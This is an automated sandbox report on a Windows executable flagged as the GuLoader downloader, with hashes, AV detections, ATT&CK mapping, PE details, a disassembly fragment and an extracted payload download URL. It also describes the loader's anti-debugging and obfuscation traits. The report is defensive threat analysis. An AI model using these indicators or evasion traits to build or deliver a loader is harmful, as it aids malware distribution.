Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Unpoetical.exe

Overview

General Information

Sample Name:Unpoetical.exe
Analysis ID:532884
MD5:72a83ab4f94c308d77e166e299b70420
SHA1:541adced7fdeaab8977935628ec837a9dbd69e15
SHA256:5de06140579c23eadb8f4f353255feb83711314b0752ca4fdfdf432d4bbc92c6
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
PE file contains strange resources
Contains functionality to read the PEB
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
PE / OLE file has an invalid certificate
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage

Classification

Process Tree

  • System is w10x64
  • Unpoetical.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\Unpoetical.exe" MD5: 72A83AB4F94C308D77E166E299B70420)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=do"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=do"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: Unpoetical.exeVirustotal: Detection: 44%Perma Link
    Source: Unpoetical.exeReversingLabs: Detection: 60%
    Source: Unpoetical.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=do
    Source: Unpoetical.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: Unpoetical.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: Unpoetical.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: Unpoetical.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: Unpoetical.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: Unpoetical.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: Unpoetical.exeString found in binary or memory: http://ocsp.digicert.com0C
    Source: Unpoetical.exeString found in binary or memory: http://ocsp.digicert.com0O
    Source: Unpoetical.exeString found in binary or memory: http://www.digicert.com/CPS0
    Source: Unpoetical.exeString found in binary or memory: https://www.digicert.com/CPS0

    System Summary:

    barindex
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: Unpoetical.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: Unpoetical.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020F68550_2_020F6855
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020ED8600_2_020ED860
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020E168F0_2_020E168F
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020ED0C60_2_020ED0C6
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020ED0DE0_2_020ED0DE
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020EC1300_2_020EC130
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020E97680_2_020E9768
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020F4B8C0_2_020F4B8C
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020EE1910_2_020EE191
    Source: Unpoetical.exeStatic PE information: invalid certificate
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020ED860 NtAllocateVirtualMemory,0_2_020ED860
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020ED0C6 NtAllocateVirtualMemory,0_2_020ED0C6
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020ED0DE NtAllocateVirtualMemory,0_2_020ED0DE
    Source: C:\Users\user\Desktop\Unpoetical.exeProcess Stats: CPU usage > 98%
    Source: Unpoetical.exeVirustotal: Detection: 44%
    Source: Unpoetical.exeReversingLabs: Detection: 60%
    Source: Unpoetical.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Unpoetical.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\Unpoetical.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: C:\Users\user\Desktop\Unpoetical.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
    Source: C:\Users\user\Desktop\Unpoetical.exeFile created: C:\Users\user\AppData\Roaming\XvFu5flZcgudIlwvVLtjOx372Jump to behavior
    Source: classification engineClassification label: mal76.rans.troj.winEXE@1/0@0/0

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_00404C04 push ebp; retf 0_2_00404C05
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_00404CEF push ebp; iretd 0_2_00404CF5
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_00401CBC push eax; retn 0041h0_2_00401CBD
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_00407323 push ebp; iretd 0_2_00407365
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_0040732D push ebp; iretd 0_2_00407365
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020E201A pushfd ; iretd 0_2_020E2020
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020E0E4D push cs; iretd 0_2_020E0E5A
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020E0CEE push ecx; ret 0_2_020E0CEF
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020E1F1C pushfd ; iretd 0_2_020E2020
    Source: C:\Users\user\Desktop\Unpoetical.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Unpoetical.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Unpoetical.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020ED0B4 rdtsc 0_2_020ED0B4
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020EC607 mov eax, dword ptr fs:[00000030h]0_2_020EC607
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020F2697 mov eax, dword ptr fs:[00000030h]0_2_020F2697
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020F4B8C mov eax, dword ptr fs:[00000030h]0_2_020F4B8C
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020F2FD3 mov eax, dword ptr fs:[00000030h]0_2_020F2FD3
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020ED0B4 rdtsc 0_2_020ED0B4
    Source: C:\Users\user\Desktop\Unpoetical.exeCode function: 0_2_020F6855 RtlAddVectoredExceptionHandler,0_2_020F6855
    Source: Unpoetical.exe, 00000000.00000002.874902943.0000000000C70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: Unpoetical.exe, 00000000.00000002.874902943.0000000000C70000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: Unpoetical.exe, 00000000.00000002.874902943.0000000000C70000.00000002.00020000.sdmpBinary or memory string: &Program Manager
    Source: Unpoetical.exe, 00000000.00000002.874902943.0000000000C70000.00000002.00020000.sdmpBinary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerSystem Information Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Unpoetical.exe45%VirustotalBrowse
    Unpoetical.exe61%ReversingLabsWin32.Downloader.GuLoader

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    0.0.Unpoetical.exe.400000.0.unpack100%AviraHEUR/AGEN.1140082Download File
    0.2.Unpoetical.exe.400000.0.unpack100%AviraHEUR/AGEN.1140082Download File

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:532884
    Start date:02.12.2021
    Start time:19:22:16
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 7m 35s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Unpoetical.exe
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:18
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal76.rans.troj.winEXE@1/0@0/0
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 44.3% (good quality ratio 26.5%)
    • Quality average: 34.2%
    • Quality standard deviation: 30.2%
    HCA Information:Failed
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .exe
    • Override analysis time to 240s for sample files taking high CPU consumption
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
    • Excluded IPs from analysis (whitelisted): 92.122.145.220
    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
    • Not all processes where analyzed, report is missing behavior information

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    No created / dropped files found

    Static File Info

    General

    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):5.202099583182856
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.15%
    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:Unpoetical.exe
    File size:152736
    MD5:72a83ab4f94c308d77e166e299b70420
    SHA1:541adced7fdeaab8977935628ec837a9dbd69e15
    SHA256:5de06140579c23eadb8f4f353255feb83711314b0752ca4fdfdf432d4bbc92c6
    SHA512:e4ecea7d95c76bde906d961d27841f2c54bbf5e1c11adb89120fea2450872cbfa1bf3f0c66d563299f2b79091174f6b2985011b4c94621e876aa47200e42705b
    SSDEEP:1536:TrQyUE6l7U/oor5sLOQrFLeUdqz8Ts/zEn9YRXAIP6mzywp:ME6l7UQoraOQrRbMz8TKc92XNPBn
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L.....(L.....................0............... ....@................

    File Icon

    Icon Hash:20047c7c70f0e004

    Static PE Info

    General

    Entrypoint:0x401888
    Entrypoint Section:.text
    Digitally signed:true
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    DLL Characteristics:
    Time Stamp:0x4C289BDE [Mon Jun 28 12:55:58 2010 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:4
    OS Version Minor:0
    File Version Major:4
    File Version Minor:0
    Subsystem Version Major:4
    Subsystem Version Minor:0
    Import Hash:b209c8634733456633136bfedc71877a

    Authenticode Signature

    Signature Valid:false
    Signature Issuer:E=cirkusartisterne@Sunburned5.SKR, CN=sjlstilstandene, OU=Bladhandlerens2, O=CRYSTALED, L=Receptivitetens9, S=Creeping, C=FJ
    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
    Error Number:-2146762487
    Not Before, Not After
    • 12/1/2021 4:21:52 AM 12/1/2022 4:21:52 AM
    Subject Chain
    • E=cirkusartisterne@Sunburned5.SKR, CN=sjlstilstandene, OU=Bladhandlerens2, O=CRYSTALED, L=Receptivitetens9, S=Creeping, C=FJ
    Version:3
    Thumbprint MD5:5BC3698C2C97D0BE2CF19994B3762274
    Thumbprint SHA-1:91A263642EA14B669A5EDD51F5BA2FDE156D47D8
    Thumbprint SHA-256:7888FBC9BE284740E820C1A153B4CE8C0DC18EEB46FF96E29301BEEF2C8EDC46
    Serial:00

    Entrypoint Preview

    Instruction
    push 004019C4h
    call 00007F162CAE29F5h
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    xor byte ptr [eax], al
    add byte ptr [eax], al
    inc eax
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [ebp-706704EBh], al
    xchg eax, ebx
    fimul word ptr [ecx-50h]
    pop ss
    xor dword ptr [ecx+42h], FFFFFFE2h
    ror byte ptr [edi], cl
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add dword ptr [eax], eax
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    dec ecx
    outsb
    imul ebp, dword ptr fs:[edi+62h], 6Ch
    jnc 00007F162CAE2A05h
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    dec esp
    xor dword ptr [eax], eax
    add byte ptr [ecx], dl
    xchg eax, edx
    cmp bh, dh
    test eax, 944AE7B2h
    push eax
    and eax, ecx
    pop ss
    std
    outsd
    push edx
    xchg eax, esp
    mov esp, 60C3CF83h
    dec dx
    mov al, 1Dh
    jecxz 00007F162CAE29B7h
    mov ecx, 3A1A6A0Ah
    dec edi
    lodsd
    xor ebx, dword ptr [ecx-48EE309Ah]
    or al, 00h
    stosb
    add byte ptr [eax-2Dh], ah
    xchg eax, ebx
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    push ebx
    add byte ptr [eax], al
    add byte ptr [esi+00h], cl
    add byte ptr [eax], al
    add byte ptr [eax+eax], cl
    inc esi
    outsd
    jc 00007F162CAE2A68h
    popad
    je 00007F162CAE2A76h
    jc 00007F162CAE2A68h
    outsb
    xor al, 00h
    or eax, 44000B01h
    inc ebp

    Data Directories

    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x214440x28.text
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000x968.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x240000x14a0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
    IMAGE_DIRECTORY_ENTRY_IAT0x10000x234.text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

    Sections

    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x20b340x21000False0.365093809186data5.28140779308IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    .data0x220000x122c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
    .rsrc0x240000x9680x1000False0.175048828125data2.06079043208IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

    Resources

    NameRVASizeTypeLanguageCountry
    RT_ICON0x248380x130data
    RT_ICON0x245500x2e8data
    RT_ICON0x244280x128GLS_BINARY_LSB_FIRST
    RT_GROUP_ICON0x243f80x30data
    RT_VERSION0x241500x2a8dataChineseTaiwan

    Imports

    DLLImport
    MSVBVM60.DLL__vbaR8FixI4, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaGet3, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarDup, __vbaVarTstGe, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

    Version Infos

    DescriptionData
    Translation0x0404 0x04b0
    LegalCopyrightUnion
    InternalNameUnpoetical
    FileVersion4.00
    CompanyNameUnion
    LegalTrademarksUnion
    ProductNameUnion
    ProductVersion4.00
    FileDescriptionUnion
    OriginalFilenameUnpoetical.exe

    Possible Origin

    Language of compilation systemCountry where language is spokenMap
    ChineseTaiwan

    Network Behavior

    No network behavior found

    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    System Behavior

    Analysis Process: Unpoetical.exe PID: 7144 Parent PID: 5712

    General

    Start time:19:23:30
    Start date:02/12/2021
    Path:C:\Users\user\Desktop\Unpoetical.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\Unpoetical.exe"
    Imagebase:0x400000
    File size:152736 bytes
    MD5 hash:72A83AB4F94C308D77E166E299B70420
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Visual Basic
    Yara matches:
    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Author: Joe Security
    Reputation:low

    Chronological Activities

    Disassembly

    Code Analysis

    Reset < >

      Analysis Process: Unpoetical.exe PID: 7144 Parent PID: 5712 Unpoetical.exeCOMMON

      Execution Graph

      Execution Coverage:15.1%
      Dynamic/Decrypted Code Coverage:49.2%
      Signature Coverage:23.8%
      Total number of Nodes:642
      Total number of Limit Nodes:31

      Graph

      execution_graph 2617 20e3d49 2620 20e3d67 2617->2620 2624 20ec538 2617->2624 2618 20f2fd3 GetPEB 2619 20f3ecb 2618->2619 2622 20e3eb2 2620->2622 2625 20e9768 2620->2625 2623 20f6850 2 API calls 2622->2623 2623->2624 2624->2618 2628 20e9887 2625->2628 2627 20f6850 2 API calls 2627->2628 2628->2625 2628->2627 2629 20eb6fe 2628->2629 2639 20ea1ca 2628->2639 2663 20f4b8c 2628->2663 2679 20ec130 2628->2679 2630 20f6850 2 API calls 2629->2630 2631 20eb711 2630->2631 2633 20f6850 2 API calls 2631->2633 2634 20eb725 2633->2634 2635 20f6850 2 API calls 2634->2635 2636 20eb817 2635->2636 2637 20f6850 2 API calls 2636->2637 2638 20eb8a1 2637->2638 2638->2620 2640 20f6850 2 API calls 2639->2640 2641 20ea590 2640->2641 2641->2629 2642 20f6850 2 API calls 2641->2642 2643 20ea818 2642->2643 2643->2629 2644 20eaa8d 2643->2644 2645 20f2767 2643->2645 2648 20f6850 2 API calls 2644->2648 2646 20f27da 2645->2646 2647 20f2fd3 GetPEB 2645->2647 2650 20f27e9 GetPEB 2646->2650 2649 20f27d0 2647->2649 2653 20eac08 2648->2653 2651 20f27e9 GetPEB 2649->2651 2652 20f27e5 2650->2652 2651->2646 2652->2620 2653->2629 2654 20f6850 2 API calls 2653->2654 2655 20eb46c 2654->2655 2655->2629 2656 20f6850 2 API calls 2655->2656 2657 20eb4d5 2656->2657 2657->2629 2658 20eb5c7 2657->2658 2659 20f6850 2 API calls 2658->2659 2660 20eb606 2659->2660 2661 20f6850 2 API calls 2660->2661 2662 20eb6fa 2661->2662 2662->2620 2664 20f4c51 2663->2664 2665 20e190b 2664->2665 2666 20f4c63 2664->2666 2668 20e168f 5 API calls 2665->2668 2667 20f2767 GetPEB 2666->2667 2669 20f4c69 2667->2669 2677 20e1910 2668->2677 2670 20f2767 GetPEB 2669->2670 2671 20f4c7f GetPEB 2670->2671 2671->2677 2672 20ed0c6 4 API calls 2673 20e1970 2672->2673 2674 20e08de 3 API calls 2673->2674 2675 20e1974 2673->2675 2676 20ef9b1 2674->2676 2675->2628 2677->2672 2677->2673 2678 20e1929 2677->2678 2678->2628 2681 20ec13c 2679->2681 2694 20e9768 2679->2694 2680 20ec279 2726 20ec27e 2680->2726 2681->2680 2721 20ec15e 2681->2721 2682 20f4b8c 6 API calls 2682->2694 2685 20f27da 2689 20f27e9 GetPEB 2685->2689 2686 20efc69 2686->2685 2687 20f2fd3 GetPEB 2686->2687 2688 20f27d0 2687->2688 2691 20f27e9 GetPEB 2688->2691 2692 20f27e5 2689->2692 2690 20f6850 2 API calls 2690->2694 2691->2685 2692->2628 2693 20eb6fe 2695 20f6850 2 API calls 2693->2695 2694->2682 2694->2690 2694->2693 2697 20ec130 6 API calls 2694->2697 2704 20ea1ca 2694->2704 2696 20eb711 2695->2696 2698 20f6850 2 API calls 2696->2698 2697->2694 2699 20eb725 2698->2699 2700 20f6850 2 API calls 2699->2700 2701 20eb817 2700->2701 2702 20f6850 2 API calls 2701->2702 2703 20eb8a1 2702->2703 2703->2628 2705 20f6850 2 API calls 2704->2705 2706 20ea590 2705->2706 2706->2693 2707 20f6850 2 API calls 2706->2707 2708 20ea818 2707->2708 2708->2686 2708->2693 2709 20eaa8d 2708->2709 2710 20f6850 2 API calls 2709->2710 2711 20eac08 2710->2711 2711->2693 2712 20f6850 2 API calls 2711->2712 2713 20eb46c 2712->2713 2713->2693 2714 20f6850 2 API calls 2713->2714 2715 20eb4d5 2714->2715 2715->2693 2716 20eb5c7 2715->2716 2717 20f6850 2 API calls 2716->2717 2718 20eb606 2717->2718 2719 20f6850 2 API calls 2718->2719 2720 20eb6fa 2719->2720 2720->2628 2722 20ed860 2 API calls 2721->2722 2723 20ec18d 2722->2723 2731 20ec3b0 2723->2731 2725 20efb5c 2727 20ed860 2 API calls 2726->2727 2728 20ec2ab 2727->2728 2729 20ec3b0 2 API calls 2728->2729 2730 20efb5c 2729->2730 2732 20ed860 2 API calls 2731->2732 2733 20ec3d1 2732->2733 2733->2725 2324 401888 #100 2325 4018ae 2324->2325 2478 41dc0b __vbaChkstk __vbaVarDup #663 __vbaVarTstNe __vbaFreeVarList 2479 41e3c4 __vbaVarDup #518 __vbaVarTstLt __vbaFreeVarList 2478->2479 2480 41dce4 6 API calls 2478->2480 2481 41e618 7 API calls 2479->2481 2482 41e44f 2479->2482 2483 41dd95 13 API calls 2480->2483 2484 41dec7 2480->2484 2486 41e47a 2482->2486 2487 41e45f __vbaNew2 2482->2487 2488 41e360 __vbaVarDup #518 __vbaStrVarMove __vbaStrMove __vbaFreeVarList 2483->2488 2489 41dfe7 2484->2489 2490 41dedd 14 API calls 2484->2490 2498 41e4d8 2486->2498 2499 41e4b8 __vbaHresultCheckObj 2486->2499 2487->2486 2488->2479 2491 41e176 2489->2491 2492 41dffd 2489->2492 2490->2488 2493 41e359 2491->2493 2496 41e1b7 2491->2496 2497 41e19c __vbaNew2 2491->2497 2494 41e028 2492->2494 2495 41e00d __vbaNew2 2492->2495 2493->2488 2501 41e086 2494->2501 2502 41e066 __vbaHresultCheckObj 2494->2502 2495->2494 2503 41e215 2496->2503 2504 41e1f5 __vbaHresultCheckObj 2496->2504 2497->2496 2500 41e4df 6 API calls 2498->2500 2499->2500 2505 41e577 2500->2505 2509 41e0df 2501->2509 2510 41e0bf __vbaHresultCheckObj 2501->2510 2502->2501 2511 41e251 __vbaHresultCheckObj 2503->2511 2512 41e274 2503->2512 2504->2503 2506 41e588 __vbaHresultCheckObj 2505->2506 2507 41e5ab 2505->2507 2508 41e5b2 6 API calls 2506->2508 2507->2508 2508->2481 2513 41e0e6 6 API calls 2509->2513 2510->2513 2514 41e27b 11 API calls 2511->2514 2512->2514 2513->2488 2514->2488 2734 40150a 2735 401532 2734->2735 2736 401543 __vbaExceptHandler 2734->2736 2735->2736 2837 41ed8b __vbaChkstk 2838 41edcb __vbaStrCopy 2837->2838 2839 41ede4 __vbaFPFix #536 __vbaStrMove __vbaFreeVar 2838->2839 2840 41ee4f 2838->2840 2841 41ee1f __vbaFreeStr __vbaFreeStr 2839->2841 2840->2840 2842 420189 __vbaChkstk #669 __vbaStrMove __vbaStrCmp __vbaFreeStr 2843 4202b1 __vbaFreeStr 2842->2843 2844 4201ef #537 __vbaStrMove 2842->2844 2846 420221 2844->2846 2847 420209 __vbaNew2 2844->2847 2848 420261 2846->2848 2849 42024a __vbaHresultCheckObj 2846->2849 2847->2846 2850 4202a5 2848->2850 2851 42028b __vbaHresultCheckObj 2848->2851 2849->2848 2852 4202a9 __vbaFreeObj 2850->2852 2851->2852 2852->2843 2366 41ec4c __vbaChkstk 